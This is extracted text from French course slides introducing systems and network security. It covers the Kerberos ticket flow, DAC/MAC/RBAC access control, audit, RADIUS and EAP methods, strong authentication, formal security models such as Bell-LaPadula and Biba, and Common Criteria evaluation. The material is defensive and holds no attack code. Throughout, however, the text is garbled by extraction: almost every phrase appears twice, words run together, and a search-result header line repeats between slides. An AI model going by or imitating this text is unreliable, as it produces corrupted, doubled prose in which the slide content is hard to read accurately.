Ticket Granting ServiceTicket Granting Service (TGS) (TGS)Fabrique les tickets de service et les fournit aux Fabrique les tickets de service et les fournit aux principalsprincipals

UDP, port 88 (Microsoft : TCP 88 UDP, port 88 (Microsoft : TCP 88 également pour les paquets de taille également pour les paquets de taille supérieur à 2000 octets)supérieur à 2000 octets)

Page 82: Initiation à la sécurité des systèmes et réseauxentrepotforall.free.fr/Cours%202004-2005/S… · PPT file · Web view · 2005-04-17Cours d’ initiation à la sécurité informatique,

KerberosKerberosTicketsTickets

Pour pouvoir accéder à un service kerberisé, il faut présenter un Pour pouvoir accéder à un service kerberisé, il faut présenter un ticket spécifique au service, appelé ticket de service (qui contient ticket spécifique au service, appelé ticket de service (qui contient la confirmation du KDC que l’utilisateur a accès au service)la confirmation du KDC que l’utilisateur a accès au service)

Un ticket contient une date d’expiration et peut être utilisé autant Un ticket contient une date d’expiration et peut être utilisé autant de fois que l’on veut tant qu’elle n’est pas atteinte ( la durée est de fois que l’on veut tant qu’elle n’est pas atteinte ( la durée est réglable, par ex. : 8 heures)réglable, par ex. : 8 heures)

L’utilisateur peut se procurer ce ticket de service auprès du TGS L’utilisateur peut se procurer ce ticket de service auprès du TGS du KDCdu KDC

Pour obtenir des tickets auprès du TGS, il faut d’abord avoir un Pour obtenir des tickets auprès du TGS, il faut d’abord avoir un ticket TGT (ticket TGT (Ticket Granting TicketTicket Granting Ticket) !) !Ce ticket permet l’accès au TGS et évite ainsi d’avoir à saisir de Ce ticket permet l’accès au TGS et évite ainsi d’avoir à saisir de nouveau son mot de passenouveau son mot de passeIl est obtenu auprès de Il est obtenu auprès de l’Authentication Servicel’Authentication Service (AS) du KDC (AS) du KDC

Page 83: Initiation à la sécurité des systèmes et réseauxentrepotforall.free.fr/Cours%202004-2005/S… · PPT file · Web view · 2005-04-17Cours d’ initiation à la sécurité informatique,

11

Client

22

44

33

TGT

Connexion initialeKDC KDC

1122

TGT

Demande de service

ST

ST

Session établie

33TGT mis en cachelocalement

Client Serveur cible

Utilisation de l'authentification Utilisation de l'authentification Kerberos version 5Kerberos version 5 (authentification réciproque)(authentification réciproque)

Page 84: Initiation à la sécurité des systèmes et réseauxentrepotforall.free.fr/Cours%202004-2005/S… · PPT file · Web view · 2005-04-17Cours d’ initiation à la sécurité informatique,

Processus d’authentification KerberosProcessus d’authentification KerberosSituation hypothétique : Jean Kevin (JK) Situation hypothétique : Jean Kevin (JK) doit imprimer son rapport de stage à doit imprimer son rapport de stage à rendre demainrendre demainLe client Kerberos demande un identifiant Le client Kerberos demande un identifiant à JK (IDJK) et contacte l’ASà JK (IDJK) et contacte l’ASL’AS contacte sa base de comptes (LDAP) L’AS contacte sa base de comptes (LDAP) et authentifie JK (dans Windows, à cette et authentifie JK (dans Windows, à cette étape le SID de l’utilisateur et de ses étape le SID de l’utilisateur et de ses groupes ainsi que ses privilèges sont groupes ainsi que ses privilèges sont récupérés)récupérés)

Page 85: Initiation à la sécurité des systèmes et réseauxentrepotforall.free.fr/Cours%202004-2005/S… · PPT file · Web view · 2005-04-17Cours d’ initiation à la sécurité informatique,

Processus d’authentification KerberosProcessus d’authentification KerberosL’AS fabrique le TGT et détermine une clé L’AS fabrique le TGT et détermine une clé de session S1 à utiliser avec le TGSde session S1 à utiliser avec le TGSLe client Kerberos envoie le TGT, un Le client Kerberos envoie le TGT, un authenticatorauthenticator (A) et le nom du service (A) et le nom du service d’impression (PR) au TGSd’impression (PR) au TGSLe TGS vérifie d’abord que le TGT et Le TGS vérifie d’abord que le TGT et l’authenticatorl’authenticator sont acceptables et ensuite sont acceptables et ensuite qu’il connaît PRqu’il connaît PR

Page 86: Initiation à la sécurité des systèmes et réseauxentrepotforall.free.fr/Cours%202004-2005/S… · PPT file · Web view · 2005-04-17Cours d’ initiation à la sécurité informatique,

Processus d’authentification KerberosProcessus d’authentification KerberosSi oui, il crée une clé de session (symétrique) S2 à Si oui, il crée une clé de session (symétrique) S2 à utiliser entre JK et PR. Il chiffre la clé une fois avec la clé utiliser entre JK et PR. Il chiffre la clé une fois avec la clé secrète de JK, et une fois avec la clé secrète de PR (il secrète de JK, et une fois avec la clé secrète de PR (il s’agit de clés secrètes que le KDC partage avec chaque s’agit de clés secrètes que le KDC partage avec chaque principalprincipal) ) Remarque : le TGS ne sait absolument pas si JK aura Remarque : le TGS ne sait absolument pas si JK aura accès à PR, il se contente d’authentifier pas d’autoriseraccès à PR, il se contente d’authentifier pas d’autoriserL’identité de JK est recopiée du TGT vers le ticket de L’identité de JK est recopiée du TGT vers le ticket de service (ST) qui contient les 2 chiffrés de la clé de service (ST) qui contient les 2 chiffrés de la clé de session S2 et le renvoie au client Kerberos de la session S2 et le renvoie au client Kerberos de la machine de JKmachine de JKLe client Kerberos récupère alors la clé secrète de JK Le client Kerberos récupère alors la clé secrète de JK (au besoin il demande son mot de passe à JK) et extrait (au besoin il demande son mot de passe à JK) et extrait la clé de session S2 depuis STla clé de session S2 depuis ST

Page 87: Initiation à la sécurité des systèmes et réseauxentrepotforall.free.fr/Cours%202004-2005/S… · PPT file · Web view · 2005-04-17Cours d’ initiation à la sécurité informatique,

Processus d’authentification KerberosProcessus d’authentification KerberosIl envoie ensuite le ticket ST et un autre Il envoie ensuite le ticket ST et un autre authenticatorauthenticator vers le service d’impression PR qui vers le service d’impression PR qui lui-même extrait la clé de session S2 (grâce à sa lui-même extrait la clé de session S2 (grâce à sa clé partagée avec le KDC)clé partagée avec le KDC)Si Si l’authenticatorl’authenticator est valide et que JK est en est valide et que JK est en mesure d’envoyer des informations chiffrées mesure d’envoyer des informations chiffrées déchiffrables avec la clé de session récupérée déchiffrables avec la clé de session récupérée par PR alors il est bien authentifié et peut donc par PR alors il est bien authentifié et peut donc imprimer (dans Windows PR crée un jeton de imprimer (dans Windows PR crée un jeton de sécurité contenant les SID présentés dans ST sécurité contenant les SID présentés dans ST dans la partie PAC, dans la partie PAC, Privilege Attribute Privilege Attribute CertificateCertificate))Ouf !Ouf !

Page 88: Initiation à la sécurité des systèmes et réseauxentrepotforall.free.fr/Cours%202004-2005/S… · PPT file · Web view · 2005-04-17Cours d’ initiation à la sécurité informatique,

Champ Authorization DataChamp Authorization DataContient des informations d’autorisationContient des informations d’autorisationDans le Kerberos MIT il est utilisé pour indiquer Dans le Kerberos MIT il est utilisé pour indiquer des restrictions d’accèsdes restrictions d’accès Par exemple, en cas d’impression par un service d’un Par exemple, en cas d’impression par un service d’un

fichier pour le compte de l’utilisateur, ce champ fichier pour le compte de l’utilisateur, ce champ contiendrait le nom du fichier afin que le serveur contiendrait le nom du fichier afin que le serveur d’impression n’ait accès qu’à ce fichierd’impression n’ait accès qu’à ce fichier

Implémentation Microsoft : ce champ est Implémentation Microsoft : ce champ est particulièrement important car il contient le SID particulièrement important car il contient le SID de l’utilisateur, de ses groupes et ses privilèges. de l’utilisateur, de ses groupes et ses privilèges. C’est le matériau utilisé pour créer le jeton de C’est le matériau utilisé pour créer le jeton de sécurité.sécurité.

Page 89: Initiation à la sécurité des systèmes et réseauxentrepotforall.free.fr/Cours%202004-2005/S… · PPT file · Web view · 2005-04-17Cours d’ initiation à la sécurité informatique,

KerberosKerberosPermet des relations d’approbation transitivesPermet des relations d’approbation transitivesWindows : découverte par interrogation du DNS Windows : découverte par interrogation du DNS (enregistrement SRV)(enregistrement SRV)Ne sert que si les services accédés le Ne sert que si les services accédés le supportentsupportentMonte bien en charge (ce n’est pas au service Monte bien en charge (ce n’est pas au service d’effectuer l’authentification mais au client de d’effectuer l’authentification mais au client de venir proposer la preuve de son authentification)venir proposer la preuve de son authentification)Bonne disponibilité (pendant la durée de validité Bonne disponibilité (pendant la durée de validité des tickets, le serveur d’authentification n’est des tickets, le serveur d’authentification n’est plus accédé et les services pour lesquels on a plus accédé et les services pour lesquels on a toujours un ticket valide sont accessibles)toujours un ticket valide sont accessibles)Problème : révocation d’un client qui a déjà Problème : révocation d’un client qui a déjà obtenu un ticket impossibleobtenu un ticket impossible

Page 90: Initiation à la sécurité des systèmes et réseauxentrepotforall.free.fr/Cours%202004-2005/S… · PPT file · Web view · 2005-04-17Cours d’ initiation à la sécurité informatique,

AnnuaireAnnuaireContient des informations à propos des Contient des informations à propos des ressources réseau (imprimantes, serveurs de ressources réseau (imprimantes, serveurs de fichiers, contrôleurs de domaine, périphériques, fichiers, contrôleurs de domaine, périphériques, utilisateurs) et fournit un schéma de nommage utilisateurs) et fournit un schéma de nommage et de descriptionet de descriptionBase de données hiérarchique contenant des Base de données hiérarchique contenant des infos essentiellement en lecture (peu de infos essentiellement en lecture (peu de modifications) comme des utilisateurs, des modifications) comme des utilisateurs, des machines, des imprimantes, des ressources et machines, des imprimantes, des ressources et les attributs de chacun d’entre euxles attributs de chacun d’entre euxPermet une certaine forme de Permet une certaine forme de Single Sign OnSingle Sign OnExemples : LDAP, NDS, Active DirectoryExemples : LDAP, NDS, Active Directory

Page 91: Initiation à la sécurité des systèmes et réseauxentrepotforall.free.fr/Cours%202004-2005/S… · PPT file · Web view · 2005-04-17Cours d’ initiation à la sécurité informatique,

Différents types de contrôles d’accèsDifférents types de contrôles d’accèsUn modèle de contrôle d’accès décrit la façon Un modèle de contrôle d’accès décrit la façon dont une entité (ou sujet) peut accéder à une dont une entité (ou sujet) peut accéder à une ressource (ou objet)ressource (ou objet)Discretionary Access Control (DAC)Discretionary Access Control (DAC) Le contrôle d’accès est à la discrétion du propriétaire Le contrôle d’accès est à la discrétion du propriétaire

de la ressourcede la ressource Par défaut, le propriétaire est le créateur de l’objetPar défaut, le propriétaire est le créateur de l’objet La propriété peut être transférée ou attribuée La propriété peut être transférée ou attribuée

différemmentdifféremment Mis en œuvre sous forme de permissions (ACL)Mis en œuvre sous forme de permissions (ACL) Le système compare le jeton de sécurité de Le système compare le jeton de sécurité de

l’utilisateur (permissions et droits) avec l’ACL de la l’utilisateur (permissions et droits) avec l’ACL de la ressourceressource

Page 92: Initiation à la sécurité des systèmes et réseauxentrepotforall.free.fr/Cours%202004-2005/S… · PPT file · Web view · 2005-04-17Cours d’ initiation à la sécurité informatique,

Différents types de contrôles d’accèsDifférents types de contrôles d’accèsMandatory Access Control (MAC)Mandatory Access Control (MAC) Basé sur un système de labels (plus strict car l’OS Basé sur un système de labels (plus strict car l’OS

prend la décision finale qui peut être contraire au prend la décision finale qui peut être contraire au souhait du propriétaire)souhait du propriétaire)

Les utilisateurs se voient attribuer un niveau Les utilisateurs se voient attribuer un niveau d’accréditation (ex: secret, confidentiel)d’accréditation (ex: secret, confidentiel)

Les données sont classées selon les mêmes niveaux Les données sont classées selon les mêmes niveaux (et cette classification accompagne les données)(et cette classification accompagne les données)

En complément des niveau d’accréditation des En complément des niveau d’accréditation des catégories peuvent être mentionnées pour respecter catégories peuvent être mentionnées pour respecter le principe du besoin de savoir (ce n’est pas parce le principe du besoin de savoir (ce n’est pas parce que j’ai l’accréditation Confidentiel que je dois avoir que j’ai l’accréditation Confidentiel que je dois avoir accès à tous les projets confidentiels)accès à tous les projets confidentiels)

Le système compare le niveau d’accréditation et les Le système compare le niveau d’accréditation et les catégories de l’utilisateur avec le label de sécuritécatégories de l’utilisateur avec le label de sécurité

Page 93: Initiation à la sécurité des systèmes et réseauxentrepotforall.free.fr/Cours%202004-2005/S… · PPT file · Web view · 2005-04-17Cours d’ initiation à la sécurité informatique,

Différents types de contrôles d’accèsDifférents types de contrôles d’accèsRole Based Access Control (RBAC)Role Based Access Control (RBAC) Aussi appelé Aussi appelé nondiscretionary access controlnondiscretionary access control Utilise un référentiel centraliséUtilise un référentiel centralisé Différence entre rôle et groupe : Différence entre rôle et groupe :

Les deux peuvent contenir des utilisateursLes deux peuvent contenir des utilisateursQuand on appartient à un groupe, on a les droits Quand on appartient à un groupe, on a les droits du groupe plus les siensdu groupe plus les siensLes rôles permettent un contrôle resserré : quand Les rôles permettent un contrôle resserré : quand on a les droits d’un rôle, on n’a rien de plus on a les droits d’un rôle, on n’a rien de plus

Pratique quand il y a de nombreux Pratique quand il y a de nombreux mouvements dans l’entreprisemouvements dans l’entreprise

Page 94: Initiation à la sécurité des systèmes et réseauxentrepotforall.free.fr/Cours%202004-2005/S… · PPT file · Web view · 2005-04-17Cours d’ initiation à la sécurité informatique,

AuditAuditSuivi des actions d’un réseau, d’une Suivi des actions d’un réseau, d’une machine, d’un logicielmachine, d’un logicielImputabilité (effet dissuasif + détection + Imputabilité (effet dissuasif + détection + éléments de correction)éléments de correction)Permet de comprendre les accès qui ont Permet de comprendre les accès qui ont eu lieu, d’identifier une brèche de sécurité eu lieu, d’identifier une brèche de sécurité ou une attaqueou une attaque

Page 95: Initiation à la sécurité des systèmes et réseauxentrepotforall.free.fr/Cours%202004-2005/S… · PPT file · Web view · 2005-04-17Cours d’ initiation à la sécurité informatique,

AuditAuditImportant : séparation des rôlesImportant : séparation des rôles On ne peut pas empêcher un administrateur On ne peut pas empêcher un administrateur

(ou quelqu’un qui vient d’obtenir ces (ou quelqu’un qui vient d’obtenir ces privilèges lors d’une attaque) de faire ce qu’il privilèges lors d’une attaque) de faire ce qu’il veut (dont effacer les veut (dont effacer les logslogs))

Il convient de séparer le rôle d’auditeur du Il convient de séparer le rôle d’auditeur du rôle d’administrateur en expédiant les audits rôle d’administrateur en expédiant les audits loin des composants auditésloin des composants audités

syslogsyslogAudit Collection SystemAudit Collection System

Page 96: Initiation à la sécurité des systèmes et réseauxentrepotforall.free.fr/Cours%202004-2005/S… · PPT file · Web view · 2005-04-17Cours d’ initiation à la sécurité informatique,

AuditAuditProblèmes : Problèmes : Tout ne doit pas être audité (conso CPU, espace Tout ne doit pas être audité (conso CPU, espace

disque)disque) La quantité d’audits générés est grande et souvent La quantité d’audits générés est grande et souvent

leur signification individuelle est faible s’ils ne sont leur signification individuelle est faible s’ils ne sont pas corrélés (d’où les IDS, systèmes de détection pas corrélés (d’où les IDS, systèmes de détection d’intrusion)d’intrusion)

Exemples :Exemples : Tentatives d’ouverture de session Tentatives d’ouverture de session

Réussites et échecsRéussites et échecsIdentifiant utiliséIdentifiant utiliséDate et heureDate et heure

Utilisation de privilègesUtilisation de privilèges Modification de fichiers sensiblesModification de fichiers sensibles

Page 97: Initiation à la sécurité des systèmes et réseauxentrepotforall.free.fr/Cours%202004-2005/S… · PPT file · Web view · 2005-04-17Cours d’ initiation à la sécurité informatique,

RADIUSRADIUSRRemote emote AAuthentication uthentication DDial-ial-IIn n UUser ser SServiceerviceAAA – Authentification, Autorisations, AccountingAAA – Authentification, Autorisations, AccountingRADIUS est utilisé à l’origine par les fournisseurs RADIUS est utilisé à l’origine par les fournisseurs d’accès à Internet pour des questions de gestion de d’accès à Internet pour des questions de gestion de l’authentification, des autorisations et du paiement des l’authentification, des autorisations et du paiement des accèsaccès

Il supporte des modules enfichables d’authentification (par Il supporte des modules enfichables d’authentification (par défaut utilise des mots de passe partagés)défaut utilise des mots de passe partagés)

PAP - PAP - Password Authentication Protocol Password Authentication Protocol CHAP, MS-CHAP et MS-CHAPv2 - CHAP, MS-CHAP et MS-CHAPv2 - Challenge Handshake Challenge Handshake Authentication Protocol Authentication Protocol EAP - EAP - Extensible Authentication ProtocolExtensible Authentication Protocol

EAP/MD5 – méthode d’authentification EAP obligatoireEAP/MD5 – méthode d’authentification EAP obligatoire EAP/TLS – authentification mutuelle (nécessite des certificats sur le EAP/TLS – authentification mutuelle (nécessite des certificats sur le

client)client) EAP/TTLS – authentification mutuelle (sans nécessité de certificat EAP/TTLS – authentification mutuelle (sans nécessité de certificat

client)client) EAP/PEAP – similaire à EAP/TTLSEAP/PEAP – similaire à EAP/TTLS

Page 98: Initiation à la sécurité des systèmes et réseauxentrepotforall.free.fr/Cours%202004-2005/S… · PPT file · Web view · 2005-04-17Cours d’ initiation à la sécurité informatique,

Authentification forteAuthentification forteIl s’agit de combiner 2 des 4 catégoriesIl s’agit de combiner 2 des 4 catégories Savoir (ce que je sais, mot de passe, code Savoir (ce que je sais, mot de passe, code

secret de type PIN)secret de type PIN) Possession (ce que je possède, jeton, carte)Possession (ce que je possède, jeton, carte) Être (ce que je suis, biométrie)Être (ce que je suis, biométrie) Savoir-faire (ce que je sais faire, mouvement)Savoir-faire (ce que je sais faire, mouvement)Carte à puceCarte à puce Stockage d’une clé privée associée à une clé Stockage d’une clé privée associée à une clé

publique associée à un certificat X509v3 + publique associée à un certificat X509v3 + code PIN permettant l’accès à cette clécode PIN permettant l’accès à cette clé

La clé privée ne quitte JAMAIS la carte à puceLa clé privée ne quitte JAMAIS la carte à puce

Page 99: Initiation à la sécurité des systèmes et réseauxentrepotforall.free.fr/Cours%202004-2005/S… · PPT file · Web view · 2005-04-17Cours d’ initiation à la sécurité informatique,

Authentification forteAuthentification forteToken SecurIDToken SecurID PasscodePasscode = mot de passe (PIN) + 6 chiffres générés = mot de passe (PIN) + 6 chiffres générés

par le tokenpar le token Le Le tokentoken enferme une graine secrète (connue du enferme une graine secrète (connue du

serveur d’authentification) et la hash avec le temps serveur d’authentification) et la hash avec le temps par un algorithme prédéterminé. Cela génère le code par un algorithme prédéterminé. Cela génère le code à 6 chiffres. Le serveur d’authentification en fait à 6 chiffres. Le serveur d’authentification en fait autant et peut vérifier le autant et peut vérifier le passcodepasscode..

Le Le passcode passcode est à usage uniqueest à usage unique((one time passwordone time password))

AudiosmartcardAudiosmartcard Code PIN + son joué par la carteCode PIN + son joué par la carte Conceptuellement, même principe que le Conceptuellement, même principe que le token token

SecurIDSecurID

Page 100: Initiation à la sécurité des systèmes et réseauxentrepotforall.free.fr/Cours%202004-2005/S… · PPT file · Web view · 2005-04-17Cours d’ initiation à la sécurité informatique,

Module 2Module 2Sécurité des systèmesSécurité des systèmes

2B - Systèmes d’exploitation2B - Systèmes d’exploitation

Page 101: Initiation à la sécurité des systèmes et réseauxentrepotforall.free.fr/Cours%202004-2005/S… · PPT file · Web view · 2005-04-17Cours d’ initiation à la sécurité informatique,

Modèles de sécuritéModèles de sécuritéUn modèle de sécurité décrit la façon dont Un modèle de sécurité décrit la façon dont un système d’exploitation doit être un système d’exploitation doit être développé de façon à respecter une développé de façon à respecter une politique de sécurité donnéepolitique de sécurité donnéeNous allons en voir plusieursNous allons en voir plusieurs

Page 102: Initiation à la sécurité des systèmes et réseauxentrepotforall.free.fr/Cours%202004-2005/S… · PPT file · Web view · 2005-04-17Cours d’ initiation à la sécurité informatique,

Moyens élémentaires de cloisonnementMoyens élémentaires de cloisonnement

Mappage de la mémoireMappage de la mémoireAnneaux de protectionAnneaux de protection Sur x86 : de 0 (plus privilégié, mode noyau du Sur x86 : de 0 (plus privilégié, mode noyau du

système) à 3 (mode utilisateur, applications)système) à 3 (mode utilisateur, applications) Sur x86 : un programme de virtualisation Sur x86 : un programme de virtualisation

comme Virtual PC s’exécute en partie en comme Virtual PC s’exécute en partie en anneau 0 et loge le système d’exploitation anneau 0 et loge le système d’exploitation invité en anneau 1; les applications restent en invité en anneau 1; les applications restent en anneau 3anneau 3

Gestion des états de threads / Gestion des états de threads / processes…processes…

Page 103: Initiation à la sécurité des systèmes et réseauxentrepotforall.free.fr/Cours%202004-2005/S… · PPT file · Web view · 2005-04-17Cours d’ initiation à la sécurité informatique,

Composants de baseComposants de baseTCB (TCB (Trusted Computing BaseTrusted Computing Base)) Vient de l’Vient de l’Orange Book Orange Book du ministère de la du ministère de la

défense des USAdéfense des USA Combinaison intégrale de tous les Combinaison intégrale de tous les

mécanismes de protection d’une machine mécanismes de protection d’une machine visant à faire respecter une politique de visant à faire respecter une politique de sécurité systèmesécurité système

Contient du matériel, du logiciel, des Contient du matériel, du logiciel, des firmwaresfirmwares

Le système part du principe que tout ce qui Le système part du principe que tout ce qui est dans la TCB assurera la sécurité et est dans la TCB assurera la sécurité et n’essaiera pas de commettre des violationsn’essaiera pas de commettre des violations

Page 104: Initiation à la sécurité des systèmes et réseauxentrepotforall.free.fr/Cours%202004-2005/S… · PPT file · Web view · 2005-04-17Cours d’ initiation à la sécurité informatique,

Composants de baseComposants de baseTCBTCB Doit être protégée contre des modifications Doit être protégée contre des modifications

volontaires ou accidentelles non autoriséesvolontaires ou accidentelles non autorisées Si elle devient corrompue, la sécurité Si elle devient corrompue, la sécurité

s’écroules’écroule C’est le périmètre de sécurité minimal entre C’est le périmètre de sécurité minimal entre

ce en quoi on a confiance et le restece en quoi on a confiance et le reste

Page 105: Initiation à la sécurité des systèmes et réseauxentrepotforall.free.fr/Cours%202004-2005/S… · PPT file · Web view · 2005-04-17Cours d’ initiation à la sécurité informatique,

Composants de baseComposants de baseReference MonitorReference Monitor Assure que les entités qui accèdent à des Assure que les entités qui accèdent à des

ressources ont les permissions nécessairesressources ont les permissions nécessaires Concerne tous les accès aux ressources Concerne tous les accès aux ressources

(=objets) par les entités (=sujets)(=objets) par les entités (=sujets)

Page 106: Initiation à la sécurité des systèmes et réseauxentrepotforall.free.fr/Cours%202004-2005/S… · PPT file · Web view · 2005-04-17Cours d’ initiation à la sécurité informatique,

Composants de baseComposants de baseSecurity KernelSecurity Kernel Mécanismes appartenant à la TCB qui Mécanismes appartenant à la TCB qui

implémentent et assurent les fonctions du implémentent et assurent les fonctions du Reference MonitorReference Monitor

S’interpose entre tous les accès et les S’interpose entre tous les accès et les fonctions entre des entités et des ressourcesfonctions entre des entités et des ressources

PrérequisPrérequisIsolation et résistance aux modificationsIsolation et résistance aux modificationsImpossibilité de le contournerImpossibilité de le contournerJuste (décisions auditables)Juste (décisions auditables)Petit afin d’être vérifiéPetit afin d’être vérifié

Page 107: Initiation à la sécurité des systèmes et réseauxentrepotforall.free.fr/Cours%202004-2005/S… · PPT file · Web view · 2005-04-17Cours d’ initiation à la sécurité informatique,

Modèle Bell-LapadulaModèle Bell-LapadulaDate des années 70, modèle de sécurité sur la Date des années 70, modèle de sécurité sur la confidentialité des flux de donnéesconfidentialité des flux de donnéesPour système multiniveau (top secret, secret, Pour système multiniveau (top secret, secret, confidentiel, non classifié) ; utilise des labelsconfidentiel, non classifié) ; utilise des labelsObjectif principal : empêcher que des infos Objectif principal : empêcher que des infos secrètes puissent être accédées de manière non secrètes puissent être accédées de manière non autoriséeautoriséeModèle pour lequel il est prouvé Modèle pour lequel il est prouvé mathématiquement qu’il empêche les données mathématiquement qu’il empêche les données d’un niveau de sécurité supérieur de fuir vers un d’un niveau de sécurité supérieur de fuir vers un niveau de sécurité inférieurniveau de sécurité inférieur

Page 108: Initiation à la sécurité des systèmes et réseauxentrepotforall.free.fr/Cours%202004-2005/S… · PPT file · Web view · 2005-04-17Cours d’ initiation à la sécurité informatique,

Modèle Bell-LapadulaModèle Bell-LapadulaPrincipe :Principe : Un sujet d’un niveau donné ne peut pas lire des Un sujet d’un niveau donné ne peut pas lire des

données d’un niveau supérieurdonnées d’un niveau supérieur Un sujet d’un niveau donné ne peut pas écrire des Un sujet d’un niveau donné ne peut pas écrire des

données dans un niveau inférieurdonnées dans un niveau inférieur Un sujet qui a le droit d’écrire et de lire ne peut le faire Un sujet qui a le droit d’écrire et de lire ne peut le faire

qu’à son niveau (rien au dessus, rien en dessous)qu’à son niveau (rien au dessus, rien en dessous)InconvénientsInconvénients Traite uniquement de confidentialité, pas d’intégritéTraite uniquement de confidentialité, pas d’intégrité Ne prend pas en compte la gestion des droits d’accès Ne prend pas en compte la gestion des droits d’accès

(pas de mécanisme de modification des droits)(pas de mécanisme de modification des droits) N’empêche pas les canaux cachésN’empêche pas les canaux cachés Ne prend pas en compte le partage de fichiers Ne prend pas en compte le partage de fichiers L’être humain est-il multiniveau ?L’être humain est-il multiniveau ?

Page 109: Initiation à la sécurité des systèmes et réseauxentrepotforall.free.fr/Cours%202004-2005/S… · PPT file · Web view · 2005-04-17Cours d’ initiation à la sécurité informatique,

Modèle BibaModèle BibaTraite du problème d’intégrité (empêche Traite du problème d’intégrité (empêche les utilisateurs non autorisés de faire des les utilisateurs non autorisés de faire des modifications)modifications)Utilise des niveaux d’intégritéUtilise des niveaux d’intégritéPrincipePrincipe Un sujet ne peut pas écrire des données dans Un sujet ne peut pas écrire des données dans

un objet d’un niveau d’intégrité supérieurun objet d’un niveau d’intégrité supérieur Un sujet ne peut pas lire des données d’un Un sujet ne peut pas lire des données d’un

niveau d’intégrité inférieurniveau d’intégrité inférieur

Page 110: Initiation à la sécurité des systèmes et réseauxentrepotforall.free.fr/Cours%202004-2005/S… · PPT file · Web view · 2005-04-17Cours d’ initiation à la sécurité informatique,

Modèle Clark-WilsonModèle Clark-WilsonTraite du problème d’intégritéTraite du problème d’intégrité Empêche les utilisateurs non autorisés de Empêche les utilisateurs non autorisés de

faire des modificationsfaire des modifications Empêche les utilisateurs autorisés de faire Empêche les utilisateurs autorisés de faire

des modifications impropresdes modifications impropres Maintient la cohérence interne et externeMaintient la cohérence interne et externePrincipePrincipe Les sujets ne peuvent pas manipuler Les sujets ne peuvent pas manipuler

directement les objets ; ils doivent utiliser une directement les objets ; ils doivent utiliser une application (permet, entre autres, la application (permet, entre autres, la séparation des rôles)séparation des rôles)

Page 111: Initiation à la sécurité des systèmes et réseauxentrepotforall.free.fr/Cours%202004-2005/S… · PPT file · Web view · 2005-04-17Cours d’ initiation à la sécurité informatique,

Modèle Brewer-NashModèle Brewer-NashMuraille de ChineMuraille de ChineContrôle d’accès qui change Contrôle d’accès qui change dynamiquement en fonction des actions dynamiquement en fonction des actions précédentes (évite le conflit d’intérêts)précédentes (évite le conflit d’intérêts) Ex : banque qui audite les comptes d’une Ex : banque qui audite les comptes d’une

entreprise ou plusieurs entreprises entreprise ou plusieurs entreprises concurrentes et propose des conseils en concurrentes et propose des conseils en investissementinvestissement

Page 112: Initiation à la sécurité des systèmes et réseauxentrepotforall.free.fr/Cours%202004-2005/S… · PPT file · Web view · 2005-04-17Cours d’ initiation à la sécurité informatique,

Niveau de confianceNiveau de confianceIndique à l’utilisateur ce qu’il peut attendre de Indique à l’utilisateur ce qu’il peut attendre de son systèmeson système Le niveau de sécurité fourniLe niveau de sécurité fourni L’assurance que le système se comportera L’assurance que le système se comportera

correctement et de manière prédictible en toute correctement et de manière prédictible en toute situationsituation

L’évaluation du niveau de confiance prend en L’évaluation du niveau de confiance prend en comptecompte Le test des mécanismes de sécurité du TCBLe test des mécanismes de sécurité du TCB L’inspection de leur conceptionL’inspection de leur conception La revue de la documentation associéeLa revue de la documentation associée Bref, revue de la façon dont le système est Bref, revue de la façon dont le système est

développé, maintenu et fournidéveloppé, maintenu et fourni

Page 113: Initiation à la sécurité des systèmes et réseauxentrepotforall.free.fr/Cours%202004-2005/S… · PPT file · Web view · 2005-04-17Cours d’ initiation à la sécurité informatique,

Évaluation de sécuritéÉvaluation de sécuritéLes Critères Communs (ISO 15408, juin Les Critères Communs (ISO 15408, juin 1999) sont le fruit d’une collaboration 1999) sont le fruit d’une collaboration internationaleinternationale Déterminent le niveau de fonctionnalitéDéterminent le niveau de fonctionnalité Le niveau d’assurance Le niveau d’assurance

Une évaluation donne lieu à un Une évaluation donne lieu à un Evaluation Evaluation Assurance LevelAssurance Level (EAL) de 1 à 7 (EAL) de 1 à 7Le niveau d’assurance obtenu est reconnu Le niveau d’assurance obtenu est reconnu dans tous les pays participants (=18) dans tous les pays participants (=18) jusqu’à EAL4jusqu’à EAL4

Page 114: Initiation à la sécurité des systèmes et réseauxentrepotforall.free.fr/Cours%202004-2005/S… · PPT file · Web view · 2005-04-17Cours d’ initiation à la sécurité informatique,

Évaluation de sécuritéÉvaluation de sécuritéPlus le niveau d’assurance (du niveau de Plus le niveau d’assurance (du niveau de confiance) est élevé, plus l’inspection a été confiance) est élevé, plus l’inspection a été poussée (les mécanismes de protection sous poussée (les mécanismes de protection sous jacents peuvent être les mêmes)jacents peuvent être les mêmes)Profil de protection (description de la solution de Profil de protection (description de la solution de sécurité souhaitée)sécurité souhaitée) Exigences de sécurité, leurs significations et leurs Exigences de sécurité, leurs significations et leurs

raisons d’être, le type et la précision de l ‘évaluationraisons d’être, le type et la précision de l ‘évaluation Permet de comparer des produits sur leur capacité à Permet de comparer des produits sur leur capacité à

répondre à une problématique donnéerépondre à une problématique donnée

Target of EvaluationTarget of Evaluation (TOE) : cible de l’évaluation (TOE) : cible de l’évaluation (= le produit testé)(= le produit testé)

Page 115: Initiation à la sécurité des systèmes et réseauxentrepotforall.free.fr/Cours%202004-2005/S… · PPT file · Web view · 2005-04-17Cours d’ initiation à la sécurité informatique,

Évaluation de sécuritéÉvaluation de sécuritéSecurity TargetSecurity Target : document expliquant les : document expliquant les fonctionnalités et les mécanismes fonctionnalités et les mécanismes d’assurance correspondant à la solution d’assurance correspondant à la solution de sécurité souhaitée (faite par le créateur de sécurité souhaitée (faite par le créateur du produit)du produit)PackagesPackages – evaluation assurance levels – evaluation assurance levels (EALs) : paquets d’exigences (EALs) : paquets d’exigences fonctionnelles et d’assurance pour fonctionnelles et d’assurance pour réutilisation (précisent les prérequis pour réutilisation (précisent les prérequis pour atteindre un EAL)atteindre un EAL)

Page 116: Initiation à la sécurité des systèmes et réseauxentrepotforall.free.fr/Cours%202004-2005/S… · PPT file · Web view · 2005-04-17Cours d’ initiation à la sécurité informatique,

Évaluation de sécuritéÉvaluation de sécuritéEn France, c’est le DCSSI qui est habilité En France, c’est le DCSSI qui est habilité à fournir des certificats d’évaluation ; les à fournir des certificats d’évaluation ; les évaluations sont réalisées dans des évaluations sont réalisées dans des CESTICESTIAttention, si un produit est certifié Attention, si un produit est certifié La version suivante ne l’est pas La version suivante ne l’est pas

nécessairementnécessairement Il faut le configurer selon la documentation CCIl faut le configurer selon la documentation CC Il n’est pas invulnérable, on a simplement Il n’est pas invulnérable, on a simplement

vérifié qu’on a fabriqué ce qu’on a ditvérifié qu’on a fabriqué ce qu’on a dit

